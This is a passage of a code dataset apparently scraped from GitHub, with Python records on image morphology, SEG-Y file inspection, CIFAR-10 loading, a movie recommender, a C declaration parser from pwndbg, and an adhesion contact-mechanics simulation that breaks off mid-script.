width-1):\n list1 = ( J[j-1, i-1], J[j-1, i], J[j-1, i+1],\n J[j, i-1], J[j, i])\n J[j, i] = min([max(list1), I[j,i]])\n\n for j in range(height-2, -1, 
-1):\n for i in range(width-2, 0, -1):\n list2 = ( J[j, i], J[j, i+1],\n J[j+1, i-1], J[j+1, i], J[j+1, i+1] )\n J[j, i] = min([max(list2), I[j, i]])\n\n dif = J - img_auxiliar\n\n if np.amax(dif) == 0:\n flag = False\n\n return J\n\ndef geodesic_erosion(I, J):\n\n I = f.negative_gray(I)\n J = f.negative_gray(J)\n\n J = geodesic_dilation(I,J)\n\n I = f.negative_gray(I)\n J = f.negative_gray(J)\n\n return J\n\ndef closing_by_reconstruction(map, n):\n img_auxiliar = np.copy(map)\n Y = np.copy(map)\n\n Y = dilation(map, n)\n dilatada = np.copy(Y)\n J = geodesic_erosion(img_auxiliar, Y)\n\n return J\n\ndef maxima(img):\n height, width = img.shape\n img_auxiliar = np.copy(img)\n\n for j in range(0, height):\n for i in range(0, width):\n if img_auxiliar[j,i] > 0:\n img_auxiliar[j,i] = img_auxiliar[j,i] - 1\n\n img_auxiliar = geodesic_dilation(img, img_auxiliar)\n img = img - img_auxiliar\n img = f.threshold(img, 1)\n\n return img\n\ndef minima(img):\n img_auxiliar = np.copy(img)\n\n img_auxiliar = f.negative_gray(img_auxiliar)\n img_auxiliar = maxima(img_auxiliar)\n# img_auxiliar = f.negativoGrises(img_auxiliar)\n\n return img_auxiliar\n\ndef watershed(ime):\n height, width = ime.shape\n fp = np.copy(ime)\n gp = np.copy(ime)\n ims = np.copy(ime) # watershed\n mask = minima(ime) # minimos de ime\n imwl = etiquetado(mask) # vertientes\n\n # cv2.imshow(\"etiq\", mask)\n\n imwl[0,:] = 1000000\n imwl[:,0] = 1000000\n imwl[height-1,:] = 1000000\n imwl[:,width-1] = 1000000\n\n lista = []\n for i in range(0, 256):\n lista.append(i)\n # # fifo jerarquica\n fifoj = {key: [] for key in lista}\n\n for j in range(1, height-1):\n for i in range(1, width-1):\n if imwl[j,i] != 0:\n ban_ = 255\n for k in range(j-1, j+2):\n for l in range(i-1, i+2):\n ban_ = ban_ & imwl[k,l]\n if ban_ == 0:\n fifoj[ime[j,i]].append([j,i])\n\n i = 0\n while(i!=256):\n while(bool(fifoj[i]) is True):\n coord = fifoj[i].pop(0)\n\n for k in range(coord[0]-1, coord[0]+2):\n for l in range(coord[1]-1, coord[1]+2):\n if imwl[k,l] == 0:\n for n in range(k-1, k+2):\n for m in range(l-1, l+2):\n if imwl[n,m] != imwl[coord[0],coord[1]] and imwl[n,m] != 0 and imwl[n,m] != 1000000:\n ims[k,l] = 255\n imwl[k,l] = imwl[coord[0],coord[1]]\n fifoj[ime[k,l]].append([k,l])\n i = i + 1\n\n return ims, imwl\n\ndef etiquetado(img):\n imgAuxiliar = np.copy(img)\n img2 = np.copy(img)\n\n height, width = img.shape\n\n k = 0\n l = 10\n fifo = []\n\n lista = []\n for i in range(0, 3000):\n lista.append(i)\n # # fifo jerarquica\n fifoj = {key: 0 for key in lista}\n\n imgAuxiliar[0,:] = 0\n imgAuxiliar[:,0] = 0\n imgAuxiliar[height-1,:] = 0\n imgAuxiliar[:,width-1] = 0\n\n for j in range(0, height):\n for i in range(0, width):\n if imgAuxiliar[j,i] != 0:\n k = k + 1\n l = l + 1\n fifo.append([j,i])\n imgAuxiliar[j,i] = 0\n img2[j,i] = k\n fifoj[k] += 1\n while(fifo):\n primas = fifo.pop(0)\n for n in range(primas[0] - 1, primas[0] + 2):\n for m in range(primas[1] - 1, primas[1] + 2):\n if imgAuxiliar[n,m] != 0:\n fifo.append([n,m])\n imgAuxiliar[n,m] = 0\n img2[n,m] = k\n fifoj[k] += 1\n\n return img2\n","repo_name":"mantoniogr/gui-uaq-breast-cancer","sub_path":"morphology.py","file_name":"morphology.py","file_ext":"py","file_size_in_byte":6020,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21083546924","text":"import sys; input = sys.stdin.readline\n\nwidth, length = map(int, input().split())\n\nif width >= 3:\n\tif length >= 6:\n\t\tprint(length - 2)\n\telif length == 
5:\n\t\tprint(4)\n\telse:\n\t\tprint(length)\n\t\t\nelif width == 2:\n\tif length >= 7:\n\t\tprint(4)\n\telif length == 6 or length == 5:\n\t\tprint(3)\n\telif length == 3 or length == 4:\n\t\tprint(2)\n\telse:\n\t\tprint(1)\n\t\t\nelse:\n\tprint(1)\n","repo_name":"SquirtlesAlgorithmStudy/squirtlesAlgorithmStudy-S345","sub_path":"SeongYong/implementation/1783. 병든 나이트/병든 나이트.py","file_name":"병든 나이트.py","file_ext":"py","file_size_in_byte":363,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"78"} +{"seq_id":"37109781382","text":"import matplotlib as mpl\nmpl.use('pdf')\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport os\nimport scipy.stats as stats\nfrom skylab import utils\nfrom scipy.stats import chi2, norm, exponweib\nfrom icecube.umdtools import cache,misc\nfrom icecube import icetray, dataclasses, histlite\nfrom optparse import OptionParser\nimport argparse\nfitfun = utils.FitDeltaChi2()\n\ndef getfig (fignum=None, aspect=None, width=None, figsize=None):\n aspect = aspect or 4/3.\n width = width or 7\n if figsize is None:\n figsize = (width, width / aspect)\n out = plt.figure (num=fignum, figsize=figsize)\n plt.clf ()\n return out\n\ndef pfig (*a, **kw):\n fig = getfig (*a, **kw)\n ax = fig.add_subplot (111)\n return fig, ax\n\n##This script should be able to plot the bckg TS, along with the TS for sensdisc, given any catalog and number of years - we'll ask cat, n as args.\n\n##arguments:\n\nparser = OptionParser (usage = '%prog [options]')\n\n\nparser.add_option ('--n', dest = 'n', type = int,\n default = 4, metavar = 'N',\n help = 'Number of years of data')\n\nopts, args = parser.parse_args ()\nyears = opts.n\n\n##Make plots prettier\nmisc.tex_mpl_rc()\nw=4\npropsmall = mpl.font_manager.FontProperties (size='small')\npropxsmall = mpl.font_manager.FontProperties (size='x-small')\n\nalldata = '/data/user/brelethford/Output/standard/allsky_sensitivity/{0}yr/'.format(str(years))\n\nbckg = alldata + 'background_trials/'\n\ndecbins=35\ndecs = np.linspace(-85.,85.,decbins)\ndecfolders = [bckg+'dec_{0:4f}/'.format(dec) for dec in decs]\n\nbins = 40\nrange = (0.0,40.0)\n\ndef chifit(datafolder):\n files = [cache.load(datafolder+file) for file in os.listdir(datafolder) if file.endswith('.array')]\n TS=[]\n for file in files:\n for entry in file:\n if entry[0]==0:\n if entry[1]<0:\n TS.append(0)\n else:\n TS.append(entry[1])\n TSs=TS\n chi2fit_flux= fitfun.fit(TSs)\n print('background only: median TS = {}'.format(str(chi2fit_flux.isf(0.5))))\n print ('max TS = {}'.format(str(max(TSs))))\n print ('Number of trials is: {}'.format(str(len(TSs))))\n print ('Percentage of TS=0 is: {}'.format(str(1.0-np.float(np.count_nonzero(TSs))/np.float(len(TSs)))))\n eta = chi2fit_flux.eta\n df = chi2fit_flux.params[0]\n \n return eta,df\n\netas,ndofs = np.array([chifit(dec) for dec in decfolders]).T\n\n## Now to plot. 
##\nfig,ax = pfig()\n\nplt.plot(np.sin(np.radians(decs)), etas, label = 'eta', color = 'blue')\nplt.plot(np.sin(np.radians(decs)), ndofs, label = 'ndof', color = 'green')\nplt.ylim(0,2)\nplt.xlim(-1.,1.)\nplt.legend(loc='upper right', prop=propsmall)\nplt.xlabel(r'$\\sin(\\delta)$')\n\nmisc.ensure_dir ('/data/user/brelethford/AGN_Core/Plots/allsky/bg_tsds/{}yr/'.format(str(years)))\nfig.savefig ('/data/user/brelethford/AGN_Core/Plots/allsky/bg_tsds/{}yr/bg_tsds_eta_ndof.png'.format(str(years)))\nmisc.ensure_dir('/home/brelethford/public_html/skylab/allsky/bg_tsds/{}yr/'.format(str(years)))\nfig.savefig('/home/brelethford/public_html/skylab/allsky/bg_tsds/{}yr/bg_tsds_eta_ndof.png'.format(str(years)))\n\n","repo_name":"brelethford/IceCube","sub_path":"skylab/sensitivity/stacking_sensitivity/plotting/TSdist_allsky.py","file_name":"TSdist_allsky.py","file_ext":"py","file_size_in_byte":3057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"70922558971","text":"#coding=utf-8\nimport os\nimport numpy as np\nimport tensorflow as tf\n\n\n#区分为training,validation和test\ndef unpickle(file):\n import pickle\n with open(file, 'rb') as fo:\n dict = pickle.load(fo, encoding='bytes')\n return dict\n\ncwd = os.getcwd()\n\ndef get_training_data():\n dict = unpickle(cwd + '/cifar10/cifar10-batches-py/data_batch_' + str(1))\n images = dict[b'data']\n labels = dict[b'labels']\n filenames = dict[b'filenames']\n\n for i in range(2,5):\n idict = unpickle(cwd + '/cifar10/cifar10-batches-py/data_batch_' + str(i));\n dict = np.row_stack((dict,idict))\n\n iimages = idict[b'data']\n images = np.row_stack((images,iimages))\n\n ilabels = idict[b'labels']\n labels = np.column_stack((labels,ilabels))\n\n ifilenames = idict[b'filenames']\n filenames = np.row_stack((filenames,ifilenames))\n\n return {b'batch_label':'training batch,40000*3072',b'data':images,b'labels':labels,b'filenames':filenames}\n\ndef get_validation_data():\n dict = unpickle(cwd + '/cifar10/cifar10-batches-py/data_batch_' + str(5))\n dict[b'batch_label']='validation data,size is 10000*3072'\n return dict\n\ndef get_test_data():\n dict = unpickle(cwd + '/cifar10/cifar10-batches-py/test_batch')\n\n return dict\n\ntest_data = get_test_data()\nprint(test_data)\nvalidation_data = get_validation_data()\n\ntraining_data = get_training_data()\nprint(training_data)","repo_name":"jowettcz/deep_learning_study","sub_path":"cifar_old/loaddata.py","file_name":"loaddata.py","file_ext":"py","file_size_in_byte":1425,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"78"} +{"seq_id":"22335637013","text":"'''\nCreated on Oct 16, 2013\n\n@author: samriggs\n\nCODE CHALLENGE: Solve the Pattern Matching Problem (restated below).\nhttps://beta.stepic.org/Bioinformatics-Algorithms-2/Some-Hidden-Messages-are-More-Surprising-than-Others-3/#step-5\n'''\n\nfrom bi_utils.helpers import sane_open\nimport sys\n\ndef p_match(filename=\"stepic_dataset.txt\", pat=''):\n with sane_open(filename) as f:\n # Python WILL match newlines. 
so get rid of them.\n if (pat is ''):\n pattern = f.readline().rstrip('\\n')\n else:\n pattern = pat\n seq = f.readline().rstrip('\\n')\n start = 1\n index = 0 \n last_index = 0\n \n while (start + len(pattern) < len(seq)):\n # get the index of the first match\n index = seq.find(pattern, start)\n # exit if no matches found at all\n if index < 0:\n break\n # update last_index if a new one found, and print it out.\n if (last_index < index):\n # preceding space only if it's not the first match\n if (last_index is not 0): sys.stdout.write(\" \")\n sys.stdout.write(str(index))\n last_index = index\n \n if start < last_index:\n start = last_index\n else:\n start += 1\n\nif (__name__ == \"__main__\"):\n p_match()","repo_name":"samriggs/bioinf","sub_path":"Homeworks/bi-Python/chapter1/quiz3_solution.py","file_name":"quiz3_solution.py","file_ext":"py","file_size_in_byte":1378,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"73702841852","text":"\"\"\"\nThis module tests the ``firestone.handlers.BaseHandler.is_catastrophic``\nmethods\n\"\"\"\nfrom firestone.handlers import BaseHandler\nfrom firestone.handlers import ModelHandler\nfrom firestone import exceptions\nfrom django.test import TestCase\nfrom django.test import RequestFactory\nfrom django.contrib.auth.models import User\nfrom model_mommy import mommy\n\ndef init_handler(handler, request, *args, **kwargs):\n # Mimicking the initialization of the handler instance\n handler.request = request\n handler.args = args\n handler.kwargs = kwargs\n return handler\n\nclass TestBaseHandlerIsCatastrophic(TestCase):\n def test_plural_delete_not_allowed(self):\n \"\"\"\n Plural DELETE is not allowed, so ``is_catastrophic`` will return True\n \"\"\"\n request = RequestFactory().delete('/')\n handler = init_handler(BaseHandler(), request)\n \n self.assertTrue(handler.is_catastrophic())\n\n def test_plural_delete_allowed(self):\n \"\"\"\n Plural DELETE is allowed, so ``is_catastrophic`` will return False\n \"\"\"\n request = RequestFactory().delete('/')\n handler = init_handler(BaseHandler(), request)\n handler.http_methods = ('PLURAL_DELETE',)\n\n self.assertFalse(handler.is_catastrophic())\n\n\n def test_plural_put_not_allowed(self):\n request = RequestFactory().put('/')\n handler = init_handler(BaseHandler(), request)\n\n self.assertTrue(handler.is_catastrophic())\n\n def test_plural_put_allowed(self):\n request = RequestFactory().put('/')\n handler = init_handler(BaseHandler(), request)\n handler.http_methods = ('PLURAL_PUT',)\n\n self.assertFalse(handler.is_catastrophic())\n","repo_name":"stargazer/django-firestone","sub_path":"testproject/testapp/tests/test_handlers_is_catastrophic.py","file_name":"test_handlers_is_catastrophic.py","file_ext":"py","file_size_in_byte":1709,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"78"} +{"seq_id":"72744433211","text":"from __future__ import annotations\n\nimport collections\n\nfrom pycparser import CParser # type: ignore\nfrom pycparser import c_ast\n\n\ndef extractTypeAndName(n, defaultName=None):\n if isinstance(n, c_ast.EllipsisParam):\n return (\"int\", 0, \"vararg\")\n\n t = n.type\n d = 0\n\n while isinstance(t, (c_ast.PtrDecl, c_ast.ArrayDecl)):\n d += 1\n children = dict(t.children())\n t = children[\"type\"]\n\n if isinstance(t, c_ast.FuncDecl):\n return extractTypeAndName(t)\n\n if isinstance(t.type, (c_ast.Struct, c_ast.Union, c_ast.Enum)):\n typename = t.type.name\n else:\n typename = 
t.type.names[0]\n\n if typename == \"void\" and d == 0 and not t.declname:\n return None\n\n name = t.declname or defaultName or \"\"\n return typename.lstrip(\"_\"), d, name.lstrip(\"_\")\n\n\nFunction = collections.namedtuple(\"Function\", (\"type\", \"derefcnt\", \"name\", \"args\"))\nArgument = collections.namedtuple(\"Argument\", (\"type\", \"derefcnt\", \"name\"))\n\n\ndef Stringify(X) -> str:\n return f\"{X.type} {X.derefcnt * '*'} {X.name}\"\n\n\ndef ExtractFuncDecl(node, verbose=False):\n # The function name needs to be dereferenced.\n ftype, fderef, fname = extractTypeAndName(node)\n\n if not fname:\n print(\"Skipping function without a name!\")\n print(node.show())\n return\n\n fargs = []\n for i, (argName, arg) in enumerate(node.args.children()):\n defname = \"arg%i\" % i\n argdata = extractTypeAndName(arg, defname)\n if argdata is not None:\n a = Argument(*argdata)\n fargs.append(a)\n\n Func = Function(ftype, fderef, fname, fargs)\n\n if verbose:\n print(Stringify(Func) + \"(\" + \",\".join(Stringify(a) for a in Func.args) + \");\")\n\n return Func\n\n\ndef ExtractAllFuncDecls(ast, verbose=False):\n Functions = {}\n\n class FuncDefVisitor(c_ast.NodeVisitor):\n def visit_FuncDecl(self, node, *a) -> None:\n f = ExtractFuncDecl(node, verbose)\n Functions[f.name] = f\n\n FuncDefVisitor().visit(ast)\n\n return Functions\n\n\ndef ExtractFuncDeclFromSource(source):\n try:\n p = CParser()\n ast = p.parse(source + \";\")\n funcs = ExtractAllFuncDecls(ast)\n for name, func in funcs.items():\n return func\n except Exception as e:\n import traceback\n\n traceback.print_exc()\n # eat it\n","repo_name":"pwndbg/pwndbg","sub_path":"pwndbg/lib/funcparser.py","file_name":"funcparser.py","file_ext":"py","file_size_in_byte":2358,"program_lang":"python","lang":"en","doc_type":"code","stars":6166,"dataset":"github-code","pt":"78"} +{"seq_id":"74111263931","text":"import algoTests\nimport dataProcessing\nimport algos\nfrom sklearn.ensemble import GradientBoostingRegressor\nfrom sklearn.metrics import mean_squared_error\nimport numpy as np\n\nnumpyArr = dataProcessing.prepData(\"training_set.csv\")\nscaledData, scaler = dataProcessing.scaleData(numpyArr)\n\ndef runAndTestRF():\n n_est = [1, 5, 10, 100, 1000]\n max_depths2 = [2, 3, 5, 8, 10]\n bootstrap = [True, False]\n\n maxr2RF = 0.8463203954661097\n ideal_n_est = 100\n ideal_depth_ = 10\n ideal_bootstrap = True\n mse = 0\n\n for n in n_est:\n for depth in max_depths2:\n for bool in bootstrap:\n r2 = algoTests.randomForest_test(scaledData, 10, n, depth, bool)\n if r2 > maxr2RF:\n maxr2RF = r2\n ideal_n_est = n\n ideal_depth_ = depth\n ideal_bootstrap = bool\n print(\"Max r2:\")\n print(r2)\n print(\"ideal estimators:\")\n print(n)\n print(\"ideal depth\")\n print(depth)\n print(\"ideal bootstrap:\")\n print(bool)\n print(\"\")\n \ndef runAndTestGB():\n learning_rates = [0.000625, 0.00125, 0.0025, 0.005] \n n_estimatorsArr = [2500, 5000, 10000, 18500] \n max_depths = [3, 6, 9]\n\n ideal_learningRate = 0.000625\n ideal_n_estimator = 18500\n ideal_depth = 3\n mse = 0\n\n maxr2 = 0.8549370158946126\n\n for lr in learning_rates:\n for n in n_estimatorsArr:\n for depth in max_depths:\n r2 = algoTests.gradientBoosting_test(scaledData, 10, lr, n, depth)\n if r2 > maxr2:\n print(\"new r2: \")\n print(r2)\n print(\"new ideal lr: \")\n print(lr)\n print(\"new ideal n est: \")\n print(n)\n print(\"New ideal depth\")\n print(depth)\n ideal_learningRate = lr \n ideal_n_estimator = n\n ideal_depth = depth\n maxr2 = r2\n print(\"\")\n\n\n print(\"Best r2 score: 
\")\n print(maxr2)\n print(\"\")\n print(\"Ideal learning rate: \")\n print(ideal_learningRate)\n print(\"\")\n print(\"Ideal number of estimators: \")\n print(ideal_n_estimator)\n print(\"\")\n print(\"Ideal depth:\")\n print(ideal_depth)\n print(\"\")\n\ndef runOptimalRF():\n r2 = algoTests.randomForest_test(scaledData, 10, 100, 10, True)\n \ndef runOptimalGB():\n r2 = algoTests.gradientBoosting_test(scaledData, 10, 0.000625, 18500, 3)\n\ndef runOptimalKNN():\n r2 = algoTests.knnr_test(scaledData, 10)\n \ndef runOptimalDNN():\n r2 = algoTests.dnn_test(scaledData, 10)\n\ndef saveOptimal_RFModel():\n algoTests.randomForest_getBestModel(scaledData, 30)\n \ndef saveOptimal_GBModel():\n algoTests.gradientBoost_getBestModel(scaledData, 30)\n \ndef saveOptimal_KNNModel():\n algoTests.knn_getBestModel(scaledData, 30)\n\ndef saveOptimal_DNNModel():\n algoTests.dnn_getBestModel(scaledData, 30)\n\n\nalgoTests.individual_price_predictor_geo()","repo_name":"isaacLabrieBoulay/HousePricePredictor","sub_path":"algoAnalyzer/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"9995030608","text":"import pickle\nfrom collections import defaultdict\nimport numpy as np\n\nNMF_Q = pickle.load(open(\"NMF_Q.pickle\", \"rb\"))\nNMF_model = pickle.load(open(\"NMF_model.pickle\", \"rb\"))\nNMF_P = pickle.load(open(\"NMF_P.pickle\", \"rb\"))\nmovies_list = pickle.load(open(\"movies_list.pickle\", 'rb'))\n# steps to take:\n# 1. impute 2.5 for unknown values from user:\n\n\ndef convert_user_info(user_movies):\n it = iter(user_movies)\n user_movies_dict = dict(zip(it, it))\n original_values = {k: float(v) for k, v in user_movies_dict.items()}\n return original_values\n\n\ndef get_rhat_user(original_values, movies_list, NMF_model, NMF_Q):\n user_values_array = np.asarray([original_values[movie] if movie in\n original_values.keys() else 0 for\n movie in movies_list])\n user_P = NMF_model.transform(user_values_array.reshape(1, -1))\n user_rhat = np.dot(user_P, NMF_Q)\n return user_rhat\n\n\ndef get_user_prediction_dict(movies_list, user_rhat):\n user_dict = dict(zip(movies_list, user_rhat[0]))\n user_pred_dict = defaultdict(list)\n {user_pred_dict[v].append(k) for k, v in user_dict.items()}\n return user_pred_dict\n\n\ndef get_movie_names(n, user_rhat, user_pred_dict, original_values):\n pred_sorted = np.sort(user_rhat)[0][::-1]\n movies_sorted = [] # list of lists\n sugg_movies = []\n for i in range(n*2):\n movies_sorted.append(user_pred_dict[pred_sorted[i]])\n print(movies_sorted)\n for movies_list in movies_sorted:\n for movie in movies_list:\n if (len(sugg_movies) < n and movie not in sugg_movies and movie not in original_values.keys()):\n sugg_movies.append(movie)\n return sugg_movies\n\n\ndef get_full_prediction(n, user_movies, movies_list, NMF_model, NMF_Q):\n original_values = convert_user_info(user_movies)\n user_rhat = get_rhat_user(original_values, movies_list, NMF_model, NMF_Q)\n user_pred_dict = get_user_prediction_dict(movies_list, user_rhat)\n sugg_movies = get_movie_names(n, user_rhat,\n user_pred_dict, original_values)\n return sugg_movies\n","repo_name":"thedinak/movie_recommender","sub_path":"recommender.py","file_name":"recommender.py","file_ext":"py","file_size_in_byte":2130,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"2326464753","text":"#!/usr/bin/env python\n\n__doc__ ='''\nFill in a metadata 
template\n\n@requires: U{Python} >= 2.5\n@requires: U{epydoc} >= 3.0.1\n\n@undocumented: __doc__\n@since: 2009-Feb-03\n@status: under development\n@organization: U{CCOM}\n'''\n\nimport os, sys\nimport simplesegy.segy as segy\n\n# FIX: make this discoverable pluging\nfrom simplesegy.displays import text,kml\n\n# FIX: do this plugin style\nformats = ('text','kml')\n\ndef main():\n '''\n command line interface for templating\n '''\n from optparse import OptionParser\n parser = OptionParser(usage=\"%prog [options]\")\n\n parser.add_option('-f', '--format', dest='format', default='text',\n type = 'choice',\n choices = formats,\n help = 'output format. One of ' + ', '.join(formats) + ' [default: %default]')\n\n parser.add_option('-s','--summary', dest='summary', default=False, action='store_true',\n help='Summary data including bounding box, bounding time, and traces')\n\n\n parser.add_option('-t', '--text-header', dest='text_header', default=False, action='store_true',\n help='print the text header')\n\n parser.add_option('-b', '--bin-header', dest='bin_header', default=False, action='store_true',\n help='print the bin header')\n\n parser.add_option('-n','--trace-num',dest='trace_num',default=None,\n type='int',\n help='Get info about a trace number (starts from 0)')\n\n parser.add_option('-a', '--all-traces', dest='all_traces', default=False, action='store_true',\n help='Dump all traces')\n\n parser.add_option('-F','--trace-fields',dest='trace_fields', default = [],\n action='append',\n help='What fields to list for an all traces heading. Sugegest \"pos\" and \"time\" [default: %default]')\n\n parser.add_option('-T', '--trace-trailer-size', dest='trace_trailer_size', default=0,\n type='int',\n help='If vendors put in extra data after each trace (ODEC needs 320) [default: %default]')\n\n parser.add_option('-B', '--byte-swap', dest='swap_byte_order', default=False, action='store_true',\n help='Use this for files that have their byte order wrong (e.g. ODEC)')\n\n parser.add_option('-v', '--verbose', dest='verbose', default=False, action='store_true',\n help='run the tests run in verbose mode')\n\n (options, args) = parser.parse_args()\n o = options\n v = o.verbose\n\n for filename in args:\n filesize = os.path.getsize(filename) / 1000000. 
# Make it MB\n\n sgy = segy.Segy(filename, swap_byte_order=o.swap_byte_order, trace_trailer_size=o.trace_trailer_size)\n\n\n # FIX: turn this into something plugable\n if o.format=='text':\n out = sys.stdout\n text.convert(out, sgy,\n summary=o.summary,\n text_header=o.text_header,\n bin_header=o.bin_header,\n all_traces=o.all_traces,\n trace_fields=o.trace_fields,\n trace_num=o.trace_num,\n verbose=v\n )\n elif 'kml'==o.format:\n\n out = sys.stdout\n kml.convert(out, sgy,\n summary=o.summary,\n text_header=o.text_header,\n bin_header=o.bin_header,\n all_traces=o.all_traces,\n trace_fields=o.trace_fields,\n trace_num=o.trace_num,\n verbose=v\n )\n","repo_name":"schwehr/simplesegy","sub_path":"simplesegy/cmds/info.py","file_name":"info.py","file_ext":"py","file_size_in_byte":3790,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"36255195275","text":"import sqlite3\r\n\r\nconn = sqlite3.connect(\"Test.db\")\r\n\r\nc = conn.cursor()\r\n\r\n# Create table\r\nc.execute('''CREATE TABLE stocks\r\n (date text, trans text, symbol text, qty real, price real)''')\r\nimport random, string\r\n\r\n\r\ndef randomString(stringLength=10):\r\n \"\"\"Generate a random string of fixed length \"\"\"\r\n letters = string.ascii_lowercase\r\n return ''.join(random.choice(letters) for i in range(stringLength))\r\n\r\n\r\nrandom_text = [randomString() for i in range(10**6)]\r\nprint(\"Random String generated\")\r\nrandom_int = [str(random.randint(0,2000)) for i in range(10**6)]\r\nprint(\"Random String generated\")\r\nimport time\r\nprint(\"Starting ...\")\r\na = time.time()\r\nfor i,j in zip(random_text,random_int):\r\n c.execute(\"INSERT INTO stocks VALUES ('2006-01-05','{}','RHAT',{},35.14)\".format(i,j))\r\nprint(\"Finished 25000 Inserts in {}\".format(time.time()-a))","repo_name":"Gauthamastro/transfer","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":867,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39227688249","text":"import numpy as np\nfrom Adhesion.System import BoundedSmoothContactSystem\nfrom Adhesion.Interactions import PowerLaw\nfrom ContactMechanics import PeriodicFFTElasticHalfSpace\nfrom ContactMechanics.Tools.Logger import Logger\nfrom SurfaceTopography import Topography\n\nfrom PythonBib.TopographyGeneration import make_topography_from_function\n\nfrom NuMPI.IO.NetCDF import NCStructuredGrid\nfrom NuMPI import MPI\nimport time\nimport os, shutil \nfrom numpy import pi\nfrom NuMPI.Tools import Reduction\n\nfrom Adhesion.ReferenceSolutions.sinewave import JKR\nfrom CrackFront.Straight import SinewaveCrackFrontLoad\nfrom CrackFront.Optimization import trustregion_newton_cg\n\ncomm = MPI.COMM_WORLD\nprint(f\"comsize:{comm.size}\")\npnp = Reduction(comm)\noutputdir=\".\"\n#################### Paramters from JKR nondimensionalisation \n\nEs = 1 / np.pi \nh=1. # amplitude (half peak to valley) of the sinewave \nsinewave_lambda = 1. \nsx = 1. 
\n#################### Parameter Definition\n# JKR\nalpha = 0.3#$alpha\nwork_of_adhesion = w = alpha**2 * np.pi / 2\n#finite interaction range\nlength_parameter = 0.1#$rho\n\n# discretisation\nnx = 1024#$npx # number of pixels in the x direction\nny = 1024#$npy\n\ndx= sx / nx\ndy = dx\nsy = dy * ny\n\n# fluctuating work of adhesion\ndw = 0.7# $dw # maximum work of adhesion fluctuation\nlcor = 0.3#$lcor # correlation length: length of the highcut\nseed = 1#$seed\nfluctuation_length = sy\n\n## simulation parameters\nmax_rel_area = maxarea = 0.5# $maxarea\nstarting_displacement = -.25\ndelta_d = 0.05\n\n\nnp.random.seed(seed)\n# generated a random noise topopgraphy, filter it to force correlation lengtrh and set mean to 0\nw_fluct_topo = Topography(\n np.random.uniform(size=(nx, ny)), physical_sizes=(sx, sy), periodic=True\n ).highcut(cutoff_wavelength=lcor).detrend()\n\nw_topo = Topography((w_fluct_topo.scale(dw / np.max(np.abs(w_fluct_topo.heights()))\n ).heights() + 1) * work_of_adhesion,\n w_fluct_topo.physical_sizes)\n\nk_topo = Topography(np.sqrt(2 * Es * w_topo.heights()),\n physical_sizes=w_topo.physical_sizes, periodic=True)\nk_topo_interp = k_topo.interpolate_bicubic()\n\n#########################################\n\ninteraction = PowerLaw(w_topo.heights(),\n # v that way the max stress is still w / rho\n 3 * length_parameter *\n np.sqrt(w_topo.heights() / work_of_adhesion),\n 3\n , communicator=comm)\n\n\n\nprint(\"setup halfspace\")\nhalfspace = PeriodicFFTElasticHalfSpace((nx, ny), Es, (sx, sy),\n communicator=comm,\n fft=\"mpi\")\nprint(\"create topography\")\n\n\ntopography = make_topography_from_function(\n lambda x,y: (-1 - np.cos(2 * np.pi * x / sx)),\n (sx,sy),\n subdomain_locations=halfspace.topography_subdomain_locations,\n nb_subdomain_grid_pts=halfspace.topography_nb_subdomain_grid_pts,\n nb_grid_pts=(nx, ny),\n periodic=True,\n communicator=comm\n)\ncx, cy = [s / 2 - s /n /2 for s, n in zip((sx, sy), (nx, ny))]\nx, y = topography.positions()\n\ndef simulate_CM():\n system = BoundedSmoothContactSystem(halfspace, interaction, topography)\n\n gtol=1e-4\n if __name__ == '__main__':\n\n monitor=None\n disp0=None\n print(\"create nc file\")\n ncfile = NCStructuredGrid(outputdir+\"/CM.nc\", mode=\"w\" ,\n nb_domain_grid_pts=system.surface.nb_grid_pts,\n decomposition='subdomain',\n subdomain_locations=system.surface.subdomain_locations,\n nb_subdomain_grid_pts=system.surface.nb_subdomain_grid_pts,\n communicator=comm)\n\n starttime = time.time()\n try:\n mode=\"forward\"\n\n counter = 1\n i = 0\n j = 0\n displacement = starting_displacement\n mean_deformation = 0\n min_max_blind_cg = 8\n max_blind_cg = 0\n min_maxiter = 4000\n max_iter = min_maxiter\n main_logger = Logger(\"main.log\")\n absstarttime = time.time()\n while True:\n\n #print(\"##############################################################\")\n print(\"displacement = {}\".format(displacement))\n #print(\"##############################################################\")\n # change disp0 to preserve gap\n if disp0 is not None:\n disp0 += displacement - displacement_prev\n displacement_prev = displacement\n\n starttime= time.time()\n sol = system.minimize_proxy(\n disp0=disp0,\n lbounds=\"auto\",\n options=dict(gtol=gtol * abs(interaction.max_tensile) * system.surface.area_per_pt, ftol=0, maxcor=3),\n logger=Logger(\"laststep.log\"),\n offset=displacement,\n callback=None\n )\n elapsed_time=time.time() - starttime\n assert sol.success, sol.message\n\n u = disp0 = sol.x\n mean_deformation_prev = mean_deformation\n 
